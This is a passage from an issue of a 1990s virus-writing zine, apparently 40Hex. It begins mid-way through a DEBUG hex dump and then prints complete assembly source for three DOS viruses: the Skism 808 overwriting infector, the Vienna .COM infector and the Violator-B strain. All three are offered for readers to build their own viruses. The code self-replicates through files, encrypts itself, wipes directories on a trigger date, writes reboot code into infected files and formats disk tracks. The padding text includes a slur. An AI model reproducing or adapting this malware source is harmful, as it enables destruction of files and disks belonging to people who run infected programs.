05D0 ED EB ED EF ED F3 FD FF FD FB FD FF FD F3 CF F0 e 05E0 F2 F4 F2 F0 F2 CC C2 BC B2 B6 FE FC FD F3 ED EF e 05F0 ED EB ED CF CA 97 A6 ED DD FB FD FF A9 BA C3 D6 e 0600 A3 C8 C2 C2 8D BE FD B2 FD FB FD FF 1A 1A 1A 1A rcx 50C w q ------------------------------------------------------------------------------ HR 40Hex Volume 1 Issue 2 0010 The 808 Virus Here another virus from Skism. It's a quick overwriting virus but you can use the source code to write your own viruses. ------------------------------------------------------------------------------ ;The Skism 808 Virus. Created 1991 by Smart Kids Into Sick Methods. filename EQU 30 ;used to find file name fileattr EQU 21 ;used to find file attributes filedate EQU 24 ;used to find file date filetime EQU 22 ;used to find file time code_start EQU 0100h ;start of all .COM files virus_size EQU 808 ;TR 808 code segment 'code' assume cs:code,ds:code,es:code org code_start main proc near jmp virus_start encrypt_val db 00h virus_start: call encrypt ;encrypt/decrypt file jmp virus ;go to start of code encrypt: push cx mov bx,offset virus_code ;start encryption at data xor_loop: mov ch,[bx] ;read current byte xor ch,encrypt_val ;get encryption key mov [bx],ch ;switch bytes inc bx ;move bx up a byte cmp bx,offset virus_code+virus_size ;are we done with the encryption jle xor_loop ;no? keep going pop cx ret infectfile: mov dx,code_start ;where virus starts in memory mov bx,handle ;load bx with handle push bx ;save handle on stack call encrypt ;encrypt file pop bx ;get back bx mov cx,virus_size ;number of bytes to write mov ah,40h ;write to file int 21h ; push bx call encrypt ;fix up the mess pop bx ret virus_code: wildcards db "*",0 ;search for directory argument filespec db "*.EXE",0 ;search for EXE file argument filespec2 db "*.*",0 rootdir db "\",0 ;argument for root directory dirdata db 43 dup (?) ;holds directory DTA filedata db 43 dup (?) ;holds files DTA diskdtaseg dw ? ;holds disk dta segment diskdtaofs dw ? ;holds disk dta offset tempofs dw ? ;holds offset tempseg dw ? ;holds segment drivecode db ? ;holds drive code currentdir db 64 dup (?) ;save current directory into this handle dw ? ;holds file handle orig_time dw ? ;holds file time orig_date dw ? ;holds file date orig_attr dw ? ;holds file attr idbuffer dw 2 dup (?) ;holds virus id virus: mov ax,3000h ;get dos version int 21h ; cmp al,02h ;is it at least 2.00? jb bus1 ;won't infect less than 2.00 mov ah,2ch ;get time int 21h ; mov encrypt_val,dl ;save m_seconds to encrypt val so ;theres 100 mutations possible setdta: mov dx,offset dirdata ;offset of where to hold new dta mov ah,1ah ;set dta address int 21h ; newdir: mov ah,19h ;get drive code int 21h ; mov dl,al ;save drivecode inc dl ;add one to dl, because functions differ mov ah,47h ;get current directory mov si, offset currentdir ;buffer to save directory in int 21h ; mov dx,offset rootdir ;move dx to change to root directory mov ah,3bh ;change directory to root int 21h ; scandirs: mov cx,13h ;include hidden/ro directorys mov dx, offset wildcards ;look for '*' mov ah,4eh ;find first file int 21h ; cmp ax,12h ;no first file? jne dirloop ;no dirs found? bail out bus1: jmp bus dirloop: mov ah,4fh ;find next file int 21h ; cmp ax,12h je bus ;no more dirs found, roll out chdir: mov dx,offset dirdata+filename;point dx to fcb - filename mov ah,3bh ;change directory int 21h ; mov ah,2fh ;get current dta address int 21h ; mov [diskdtaseg],es ;save old segment mov [diskdtaofs],bx ;save old offset mov dx,offset filedata ;offset of where to hold new dta mov ah,1ah ;set dta address int 21h ; scandir: mov cx,07h ;find any attribute mov dx,offset filespec ;point dx to "*.COM",0 mov ah,4eh ;find first file function int 21h ; cmp ax,12h ;was file found? jne transform nextexe: mov ah,4fh ;find next file int 21h ; cmp ax,12h ;none found jne transform ;found see what we can do mov dx,offset rootdir ;move dx to change to root directory mov ah,3bh ;change directory to root int 21h ; mov ah,1ah ;set dta address mov ds,[diskdtaseg] ;restore old segment mov dx,[diskdtaofs] ;restore old offset int 21h ; jmp dirloop bus: jmp rollout transform: mov ah,2fh ;temporally store dta int 21h ; mov [tempseg],es ;save old segment mov [tempofs],bx ;save old offset mov dx, offset filedata + filename mov bx,offset filedata ;save file... mov ax,[bx]+filedate ;date mov orig_date,ax ; mov ax,[bx]+filetime ;time mov orig_time,ax ; and mov ax,[bx]+fileattr ; mov ax,4300h int 21h mov orig_attr,cx mov ax,4301h ;change attributes xor cx,cx ;clear attributes int 21h ; mov ax,3d00h ;open file - read int 21h ; jc fixup ;error - find another file mov handle,ax ;save handle mov ah,3fh ;read from file mov bx,handle ;move handle to bx mov cx,02h ;read 2 bytes mov dx,offset idbuffer ;save to buffer int 21h ; mov ah,3eh ;close file for now mov bx,handle ;load bx with handle int 21h ; mov bx, idbuffer ;fill bx with id string cmp bx,02ebh ;infected? jne doit ;same - find another file fixup: mov ah,1ah ;set dta address mov ds,[tempseg] ;restore old segment mov dx,[tempofs] ;restore old offset int 21h ; jmp nextexe doit: mov dx, offset filedata + filename mov ax,3d02h ;open file read/write access int 21h ; mov handle,ax ;save handle call infectfile ;mov ax,3eh ;close file ;int 21h rollout: mov ax,5701h ;restore original mov bx,handle ; mov cx,orig_time ;time and mov dx,orig_date ;date int 21h ; mov ax,4301h ;restore original attributes mov cx,orig_attr mov dx,offset filedata + filename int 21h ;mov bx,handle ;mov ax,3eh ;close file ;int 21h mov ah,3bh ;try to fix this mov dx,offset rootdir ;for speed int 21h ; mov ah,3bh ;change directory mov dx,offset currentdir ;back to original int 21h ; mov ah,2ah ;check system date int 21h ; cmp cx,1991 ;is it at least 1991? jb audi ;no? don't do it now cmp dl,25 ;is it the 25th? jb audi ;not yet? quit cmp al,5 ;is Friday? jne audi ;no? quit mov dx,offset dirdata ;offset of where to hold new dta mov ah,1ah ;set dta address int 21h ; mov ah,4eh ;find first file mov cx,7h ; mov dx,offset filespec2 ;offset *.* Loops: int 21h ; jc audi ;error? then quit mov ax,4301h ;find all normal files xor cx,cx ; int 21h ; mov dx,offset dirdata + filename mov ah,3ch ;fuck up all files in current dir int 21h ; jc audi ;error? quit mov ah,4fh ;find next file jmp loops ; audi: mov ax,4c00h ;end program int 21h ; ;The below is just text to pad out the virus size to 808 bytes. Don't ;just change the text and claim that this is your creation. words_ db "Skism Rythem Stack Virus-808. Smart Kids Into Sick Methods",0 words2 db " Dont alter this code into your own strain, faggit. ",0 words3 db " HR/SSS NYCity, this is the fifth of many, many more....",0 words4 db " You sissys.....",0 main endp code ends end main ------------------------------------------------------------------------------ HR 40Hex Volume 1 Issue 2 0011 Vienna and Violator Viruses The Vienna virus, since it's source code was released, has become one of the most common viruses ever. Not only that but there are over 20 known strains of this virus. We at 40Hex want to add on to the list by giving out the source for the orginal Vienna virus as well as the Violator-B source by Rabid. ------------------------------------------------------------------------------ MOV_CX MACRO X DB 0B9H DW X ENDM CODE SEGMENT ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE ORG $+0100H ;***************************************************************************** ;Start out with a JMP around the remains of the original .COM file, into the ;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS. ;The rest of the file (first 3 bytes) are stored in the virus data area. ;***************************************************************************** VCODE: JMP virus ;This was the rest of the original .COM file. Tiny and simple, this time NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP ;************************************************************ ; The actual virus starts here ;************************************************************ v_start equ $ virus: PUSH CX MOV DX,OFFSET vir_dat ;This is where the virus data starts. ; The 2nd and 3rd bytes get modified. CLD ;Pointers will be auto INcremented MOV SI,DX ;Access data as offset from SI ADD SI,first_3 ;Point to original 1st 3 bytes of .COM MOV DI,OFFSET 100H ;`cause all .COM files start at 100H MOV CX,3 REPZ MOVSB ;Restore original first 3 bytes of .COM MOV SI,DX ;Keep SI pointing to the data area ;************************************************************* ; Check the DOS version ;************************************************************* MOV AH,30H INT 21H CMP AL,0 ;0 means it's version 1.X JNZ dos_ok ;For version 2.0 or greater JMP quit ;Don't try to infect version 1.X ;************************************************************* ; Here if the DOS version is high enough for this to work ;************************************************************* dos_ok: PUSH ES ;************************************************************* ; Get DTA address into ES:BX ;************************************************************* MOV AH,2FH INT 21H ;************************************************************* ; Save the DTA address ;************************************************************* MOV [SI+old_dta],BX MOV [SI+old_dts],ES ;Save the DTA address POP ES ;************************************************************* ; Set DTA to point inside the virus data area ;************************************************************* MOV DX,dta ;Offset of new DTA in virus data area ; NOP ;MASM will add this NOP here ADD DX,SI ;Compute DTA address MOV AH,1AH INT 21H ;Set new DTA to inside our own code PUSH ES PUSH SI MOV ES,DS:2CH MOV DI,0 ;ES:DI points to environment ;************************************************************ ; Find the "PATH=" string in the environment ;************************************************************ find_path: POP SI PUSH SI ;Get SI back ADD SI,env_str ;Point to "PATH=" string in data area LODSB MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long REPNZ SCASB ;Search for first character MOV CX,4 ;************************************************************ ; Loop to check for the next four characters ;************************************************************ check_next_4: LODSB SCASB JNZ find_path ;If not all there, abort & start over LOOP check_next_4 ;Loop to check the next character POP SI POP ES MOV [SI+path_ad],DI ;Save the address of the PATH MOV DI,SI ADD DI,wrk_spc ;File name workspace MOV BX,SI ;Save a copy of SI ADD SI,wrk_spc ;Point SI to workspace MOV DI,SI ;Point DI to workspace JMP SHORT slash_ok ;********************************************************** ; Look in the PATH for more subdirectories, if any ;********************************************************** set_subdir: CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? JNZ found_subdir ;If not, there are more subdirectories JMP all_done ;Else, we're all done ;********************************************************** ; Here if there are more subdirectories in the path ;********************************************************** found_subdir: PUSH DS PUSH SI MOV DS,ES:2CH ;DS points to environment segment MOV DI,SI MOV SI,ES:[DI+path_ad] ;SI = PATH address ADD DI,wrk_spc ;DI points to file name workspace ;*********************************************************** ; Move subdirectory name into file name workspace ;*********************************************************** move_subdir: LODSB ;Get character CMP AL,';' ;Is it a ';' delimiter? JZ moved_one ;Yes, found another subdirectory CMP AL,0 ;End of PATH string? JZ moved_last_one ;Yes STOSB ;Save PATH marker into [DI] JMP SHORT move_subdir ;****************************************************************** ; Mark the fact that we're looking through the final subdirectory ;****************************************************************** moved_last_one: MOV SI,0 ;****************************************************************** ; Here after we've moved a subdirectory ;****************************************************************** moved_one: POP BX ;Pointer to virus data area POP DS ;Restore DS MOV [BX+path_ad],SI ;Address of next subdirectory NOP ;****************************************************************** ; Make sure subdirectory ends in a "\" ;****************************************************************** CMP CH,'\' ;Ends with "\"? JZ slash_ok ;If yes MOV AL,'\' ;Add one, if not STOSB ;****************************************************************** ; Here after we know there's a backslash at end of subdir ;****************************************************************** slash_ok: MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace MOV SI,BX ;Restore SI ADD SI,f_spec ;Point to "*.COM" MOV CX,6 REPZ MOVSB ;Move "*.COM",0 to workspace MOV SI,BX ;******************************************************************* ; Find first string matching *.COM ;******************************************************************* MOV AH,4EH MOV DX,wrk_spc ; NOP ;MASM will add this NOP here ADD DX,SI ;DX points to "*.COM" in workspace MOV CX,3 ;Attributes of Read Only or Hidden OK INT 21H JMP SHORT find_first ;******************************************************************* ; Find next ASCIIZ string matching *.COM ;******************************************************************* find_next: MOV AH,4FH INT 21H find_first: JNB found_file ;Jump if we found it JMP SHORT set_subdir ;Otherwise, get another subdirectory ;******************************************************************* ; Here when we find a file ;******************************************************************* found_file: MOV AX,[SI+dta_tim] ;Get time from DTA AND AL,1FH ;Mask to remove all but seconds CMP AL,1FH ;62 seconds -> already infected JZ find_next ;If so, go find another file CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? JA find_next ;If too long, find another one CMP WORD PTR [SI+dta_len],0AH ;Is it too short? JB find_next ;Then go find another one MOV DI,[SI+nam_ptr] ;DI points to file name PUSH SI ;Save SI ADD SI,dta_nam ;Point SI to file name ;******************************************************************** ; Move the name to the end of the path ;******************************************************************** more_chars: LODSB STOSB CMP AL,0 JNZ more_chars ;Move characters until we find a 00 ;******************************************************************** ; Get File Attributes ;******************************************************************** POP SI MOV AX,OFFSET 4300H MOV DX,wrk_spc ;Point to \path\name in workspace ; NOP ;MASM will add this NOP here ADD DX,SI INT 21H MOV [SI+old_att],CX ;Save the old attributes ;******************************************************************** ; Rewrite the attributes to allow writing to the file ;******************************************************************** MOV AX,OFFSET 4301H ;Set attributes AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) MOV DX,wrk_spc ;Offset of \path\name in workspace ; NOP ;MASM will add this NOP here ADD DX,SI ;Point to \path\name INT 21H ;******************************************************************** ; Open Read/Write channel to the file ;******************************************************************** MOV AX,OFFSET 3D02H ;Read/Write MOV DX,wrk_spc ;Offset to \path\name in workspace ; NOP ;MASM will add this NOP here ADD DX,SI ;Point to \path\name INT 21H JNB opened_ok ;If file was opened OK JMP fix_attr ;If it failed, restore the attributes ;******************************************************************* ; Get the file date & time ;******************************************************************* opened_ok: MOV BX,AX MOV AX,OFFSET 5700H INT 21H MOV [SI+old_tim],CX ;Save file time MOV [SI+ol_date],DX ;Save the date ;******************************************************************* ; Get current system time ;******************************************************************* MOV AH,2CH INT 21H AND DH,7 ;Last 3 bits 0? (once in eight) JNZ seven_in_eight ;******************************************************************* ; The special "one in eight" infection. If the above line were in ; its original form, this code would be run 1/8 of the time, and ; rather than appending a copy of this virus to the .COM file, the ; file would get 5 bytes of code that reboot the system when the ; .COM file is run. ;******************************************************************* MOV AH,40H ;Write to file MOV CX,5 ;Five bytes MOV DX,SI ADD DX,reboot ;Offset of reboot code in data area INT 21H JMP SHORT fix_time_stamp NOP ;****************************************************************** ; Here's where we infect a .COM file with this virus ;****************************************************************** seven_in_eight: MOV AH,3FH MOV CX,3 MOV DX,first_3 ; NOP ;MASM will add this NOP here ADD DX,SI INT 21H ;Save first 3 bytes into the data area JB fix_time_stamp ;Quit, if read failed CMP AX,3 ;Were we able to read all 3 bytes? JNZ fix_time_stamp ;Quit, if not ;****************************************************************** ; Move file pointer to end of file ;****************************************************************** MOV AX,OFFSET 4202H MOV CX,0 MOV DX,0 INT 21H JB fix_time_stamp ;Quit, if it didn't work MOV CX,AX ;DX:AX (long int) = file size SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction ADD CX,OFFSET c_len_y MOV DI,SI ;Point DI to virus data area SUB DI,OFFSET c_len_x ;Point DI to reference vir_dat, at start of pgm MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm ;******************************************************************* ; Write virus code to file ;******************************************************************* MOV AH,40H MOV_CX virlen ;Length of virus, in bytes MOV DX,SI SUB DX,OFFSET codelen ;Length of virus code, gives starting ; address of virus code in memory INT 21H JB fix_time_stamp ;Jump if error CMP AX,OFFSET virlen ;All bytes written? JNZ fix_time_stamp ;Jump if error ;********************************************************************** ; Move file pointer to beginning of the file ;********************************************************************** MOV AX,OFFSET 4200H MOV CX,0 MOV DX,0 INT 21H JB fix_time_stamp ;Jump if error ;********************************************************************** ; Write the 3 byte JMP at the start of the file ;********************************************************************** MOV AH,40H MOV CX,3 MOV DX,SI ;Virus data area ADD DX,jmp_op ;Point to the reconstructed JMP INT 21H ;********************************************************************** ; Restore old file date & time, with seconds modified to 62 ;********************************************************************** fix_time_stamp: MOV DX,[SI+ol_date] ;Old file date MOV CX,[SI+old_tim] ;Old file time AND CX,OFFSET 0FFE0H OR CX,1FH ;Seconds = 31/30 min = 62 seconds MOV AX,OFFSET 5701H INT 21H ;********************************************************************** ; Close File ;********************************************************************** MOV AH,3EH INT 21H ;********************************************************************** ; Restore Old File Attributes ;********************************************************************** fix_attr: MOV AX,OFFSET 4301H MOV CX,[SI+old_att] ;Old Attributes MOV DX,wrk_spc ; NOP ;MASM will add this NOP ADD DX,SI ;DX points to \path\name in workspace INT 21H ;********************************************************************** ; Here when it's time to close it up & end ;********************************************************************** all_done: PUSH DS ;********************************************************************** ; Restore old DTA ;********************************************************************** MOV AH,1AH MOV DX,[SI+old_dta] MOV DS,[SI+old_dts] INT 21H POP DS ;************************************************************************* ; Clear registers used, & do a weird kind of JMP 100. The weirdness comes ; in since the address in a real JMP 100 is an offset, and the offset ; varies from one infected file to the next. By PUSHing an 0100H onto the ; stack, we can RET to address 0100H just as though we JMPed there. ;********************************************************************** quit: POP CX XOR AX,AX XOR BX,BX XOR DX,DX XOR SI,SI MOV DI,OFFSET 0100H PUSH DI XOR DI,DI RET 0FFFFH ;************************************************************************ ;The virus data starts here. It's accessed off the SI register, per the ; comments as shown ;************************************************************************ vir_dat EQU $ ;Use this with (SI + old_dta) olddta_ DW 0 ;Old DTA offset ;Use this with (SI + old_dts) olddts_ DW 0 ;Old DTA segment ;Use this with (SI + old_tim) oldtim_ DW 0 ;Old Time ;Use this with (SI + ol_date) oldate_ DW 0 ;Old date ;Use this with (SI + old_att) oldatt_ DW 0 ;Old file attributes ;Here's where the first three bytes of the original .COM file go.(SI + first_3) first3_ EQU $ INT 20H NOP ;Here's where the new JMP instruction is worked out ;Use this with (SI + jmp_op) jmpop_ DB 0E9H ;Start of JMP instruction ;Use this with (SI + jmp_dsp) jmpdsp_ DW 0 ;The displacement part ;This is the type of file we're looking to infect. (SI + f_spec) fspec_ DB '*.COM',0 ;Use this with (SI + path_ad) pathad_ DW 0 ;Path address ;Use this with (SI + nam_ptr) namptr_ DW 0 ;Pointer to start of file name ;Use this with (SI + env_str) envstr_ DB 'PATH=' ;Find this in the environment ;File name workspace (SI + wrk_spc) wrkspc_ DB 40h dup (0) ;Use this with (SI + dta) dta_ DB 16h dup (0) ;Temporary DTA goes here ;Use this with (SI + dta_tim) dtatim_ DW 0,0 ;Time stamp in DTA ;Use this with (SI + dta_len) dtalen_ DW 0,0 ;File length in the DTA ;Use this with (SI + dta_nam) dtanam_ DB 0Dh dup (0) ;File name in the DTA ;Use this with (SI + reboot) reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 lst_byt EQU $ ;All lines that assemble into code are ; above this one ;***************************************************************************** ;The virus needs to know a few details about its own size and the size of its ; code portion. Let the assembler figure out these sizes automatically. ;***************************************************************************** virlen = lst_byt - v_start ;Length, in bytes, of the entire virus codelen = vir_dat - v_start ;Length of virus code, only c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP ;***************************************************************************** ;Because this code is being appended to the end of an executable file, the ; exact address of its variables cannot be known. All are accessed as offsets ; from SI, which is represented as vir_dat in the below declarations. ;***************************************************************************** old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp ol_date = oldate_ - vir_dat ;Displacement to old file date stamp old_att = oldatt_ - vir_dat ;Displacement to old attributes first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string path_ad = pathad_ - vir_dat ;Displacement to the path address nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace dta = dta_ - vir_dat ;Displacement to the temporary DTA dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code CODE ENDS END VCODE ------------------------------------------------------------------------------ Now here's the source for Violator-B ------------------------------------------------------------------------------ ;***************************************************************************** ; ; Violator - Strain B ; ;***************************************************************************** ; ; (Aug/09/90) ; ; Development Notes: ; ; I encountered several errors in the original Violator code which I ; corrected in this version. Mainly, the INT 26 routine to fuck the ; disk. It seems that the routine would crash right after the INT 26 ; was executed and the whole program would die. I have since fixed ; this problem in this version with an INT 13, AH 05 (Format Track) ; command. This works better than the subsequent INT 26. ; ; ;***************************************************************************** ; ; Written by - The High Evolutionary - ; RABID Head Programmer ; ; Revised by: ½Onslaught» ; No affiliation with rabId ; ; Copyright (C) 1990 by RABID Nat'nl Development Corp. ; ;***************************************************************************** MOV_CX MACRO X DB 0B9H DW X ENDM CODE SEGMENT ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE ORG $+0100H ; Set ORG to 100H plus our own VCODE: JMP virus NOP NOP NOP ;15 NOP's to place JMP Header NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP v_start equ $ virus: PUSH CX MOV DX,OFFSET vir_dat CLD MOV SI,DX ADD SI,first_3 MOV CX,3 MOV DI,OFFSET 100H REPZ MOVSB MOV SI,DX MOV AH,30H INT 21H CMP AL,0 ;Quit it it's DOS 1.0 JNZ dos_ok JMP quit dos_ok: PUSH ES MOV AH,2FH INT 21H MOV [SI+old_dta],BX MOV [SI+old_dts],ES POP ES MOV DX,dta ADD DX,SI MOV AH,1AH INT 21H PUSH ES PUSH SI MOV ES,DS:2CH MOV DI,0 JMP year_check year_check: MOV AH,2AH ;Get date info INT 21H ;Call DOS CMP CX,1990 ;Check to see if the year is 1990 JGE month_check ;If greater or equal, check month JMP find_path ;If not, go on with infection month_check: MOV AH,2AH ;Get date info INT 21h ;Call DOS CMP DH,10 ;Check to see if it is September JGE day_check ;If greater or equal, check day JMP find_path ;if not, go on with infection day_check: MOV AH,2Ah ;Get date info INT 21H ;Call DOS CMP DL,31 ;Check to see if it is the 4th JGE multiplex ;If yes, then nuke drives A:-Z: JMP find_path ;If not, then go on with infection multiplex: MOV AL,cntr ;Counter is the drive to kill CALL alter ;Go and kill the drive ;25 is drive Z: CMP cntr,25 ;Is (cntr) 25 ? JE find_path ;Go on with infection INC cntr ;Add one to (cntr) LOOP multiplex ;Loop back up to kill next drive alter: MOV AH,05 ;Format Track MOV CH,0 ;Format track 0 MOV DH,0 ;Head 0 MOV DL,cntr ;Format for drive in (cntr) INT 13h ;Call RWTS RET ;Return up for next drive find_path: POP SI PUSH SI ADD SI,env_str LODSB MOV CX,OFFSET 8000H REPNZ SCASB MOV CX,4 check_next_4: LODSB SCASB ; ; The JNZ line specifies that if there is no PATH present, then we will go ; along and infect the ROOT directory on the default drive. ; JNZ find_path ;If not path, then go to ROOT dir LOOP check_next_4 ;Go back and check for more chars POP SI ;Load in PATH again to look for chars POP ES MOV [SI+path_ad],DI MOV DI,SI ADD DI,wrk_spc ;Put the filename in wrk_spc MOV BX,SI ADD SI,wrk_spc MOV DI,SI JMP SHORT slash_ok set_subdir: CMP WORD PTR [SI+path_ad],0 JNZ found_subdir JMP all_done found_subdir: PUSH DS PUSH SI MOV DS,ES:2CH MOV DI,SI MOV SI,ES:[DI+path_ad] ADD DI,wrk_spc ;DI is the file name to infect! (hehe) move_subdir: LODSB ;To tedious work to move into subdir CMP AL,';' ;Does it end with a ; charachter? JZ moved_one ;if yes, then we found a subdir CMP AL,0 ;is it the end of the path? JZ moved_last_one ;if yes, then we save the PATH STOSB ;marker into DI for future reference JMP SHORT move_subdir moved_last_one: MOV SI,0 moved_one: POP BX ;BX is where the virus data is POP DS ;Restore DS so that we can do stuph MOV [BX+path_ad],SI ;Where is the next subdir? NOP CMP CH,'\' ;Check to see if it ends in \ JZ slash_ok ;If yes, then it's OK MOV AL,'\' ;if not, then add one... STOSB ;store the sucker slash_ok: MOV [BX+nam_ptr],DI ;Move the filename into workspace MOV SI,BX ;Restore the original SI value ADD SI,f_spec ;Point to COM file victim MOV CX,6 REPZ MOVSB ;Move victim into workspace MOV SI,BX MOV AH,4EH MOV DX,wrk_spc ADD DX,SI ;DX is ... THE VICTIM!!! MOV CX,3 ;Attributes of Read Only or Hidden OK INT 21H JMP SHORT find_first find_next: MOV AH,4FH INT 21H find_first: JNB found_file ;Jump if we found it JMP SHORT set_subdir ;Otherwise, get another subdirectory found_file: MOV AX,[SI+dta_tim] ;Get time from DTA AND AL,1EH ;Mask to remove all but seconds CMP AL,1EH ;60 seconds JZ find_next CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? JA find_next ;If too long, find another one CMP WORD PTR [SI+dta_len],0AH ;Is it too short? JB find_next ;Then go find another one MOV DI,[SI+nam_ptr] PUSH SI ADD SI,dta_nam more_chars: LODSB STOSB CMP AL,0 JNZ more_chars POP SI MOV AX,OFFSET 4300H MOV DX,wrk_spc ADD DX,SI INT 21H MOV [SI+old_att],CX MOV AX,OFFSET 4301H AND CX,OFFSET 0FFFEH MOV DX,wrk_spc ADD DX,SI INT 21H MOV AX,OFFSET 3D02H MOV DX,wrk_spc ADD DX,SI INT 21H JNB opened_ok JMP fix_attr opened_ok: MOV BX,AX MOV AX,OFFSET 5700H INT 21H MOV [SI+old_tim],CX ;Save file time MOV [SI+ol_date],DX ;Save the date MOV AH,2CH INT 21H AND DH,7 JMP infect infect: MOV AH,3FH MOV CX,3 MOV DX,first_3 ADD DX,SI INT 21H ;Save first 3 bytes into the data area JB fix_time_stamp CMP AX,3 JNZ fix_time_stamp MOV AX,OFFSET 4202H MOV CX,0 MOV DX,0 INT 21H JB fix_time_stamp MOV CX,AX SUB AX,3 MOV [SI+jmp_dsp],AX ADD CX,OFFSET c_len_y MOV DI,SI SUB DI,OFFSET c_len_x MOV [DI],CX MOV AH,40H MOV_CX virlen MOV DX,SI SUB DX,OFFSET codelen INT 21H JB fix_time_stamp CMP AX,OFFSET virlen JNZ fix_time_stamp MOV AX,OFFSET 4200H MOV CX,0 MOV DX,0 INT 21H JB fix_time_stamp MOV AH,40H MOV CX,3 MOV DX,SI ADD DX,jmp_op INT 21H fix_time_stamp: MOV DX,[SI+ol_date] MOV CX,[SI+old_tim] AND CX,OFFSET 0FFE0H OR CX,1EH MOV AX,OFFSET 5701H INT 21H MOV AH,3EH INT 21H fix_attr: MOV AX,OFFSET 4301H MOV CX,[SI+old_att] MOV DX,wrk_spc ADD DX,SI INT 21H all_done: PUSH DS MOV AH,1AH MOV DX,[SI+old_dta] MOV DS,[SI+old_dts] INT 21H POP DS quit: POP CX XOR AX,AX ;XOR values so that we will give the XOR BX,BX ;poor sucker a hard time trying to XOR DX,DX ;reassemble the source code if he XOR SI,SI ;decides to dissassemble us. MOV DI,OFFSET 0100H PUSH DI XOR DI,DI RET 0FFFFH ;Return back to the beginning ;of the program vir_dat EQU $ intro db '.D$^i*&B)_a.%R',13,10 olddta_ DW 0 olddts_ DW 0 oldtim_ DW 0 count_ DW 0 cntr DB 2 ; Drive to nuke from (C:+++) oldate_ DW 0 oldatt_ DW 0 first3_ EQU $ INT 20H NOP jmpop_ DB 0E9H jmpdsp_ DW 0 fspec_ DB '*.COM',0 pathad_ DW 0 namptr_ DW 0 envstr_ DB 'PATH=' wrkspc_ DB 40h dup (0) dta_ DB 16h dup (0) dtatim_ DW 0,0 dtalen_ DW 0,0 dtanam_ DB 0Dh dup (0) lst_byt EQU $ virlen = lst_byt - v_start codelen = vir_dat - v_start c_len_x = vir_dat - v_start - 2 c_len_y = vir_dat - v_start + 100H old_dta = olddta_ - vir_dat old_dts = olddts_ - vir_dat old_tim = oldtim_ - vir_dat ol_date = oldate_ - vir_dat old_att = oldatt_ - vir_dat first_3 = first3_ - vir_dat jmp_op = jmpop_ - vir_dat jmp_dsp = jmpdsp_ - vir_dat f_spec = fspec_ - vir_dat path_ad = pathad_ - vir_dat nam_ptr = namptr_ - vir_dat env_str = envstr_ - vir_dat wrk_spc = wrkspc_ - vir_dat dta = dta_ - vir_dat dta_tim = dtatim_ - vir_dat dta_len = dtalen_ - vir_dat dta_nam = dtanam_ - vir_dat count = count_ - vir_dat CODE ENDS END VCODE ------------------------------------------------------------------------------ HR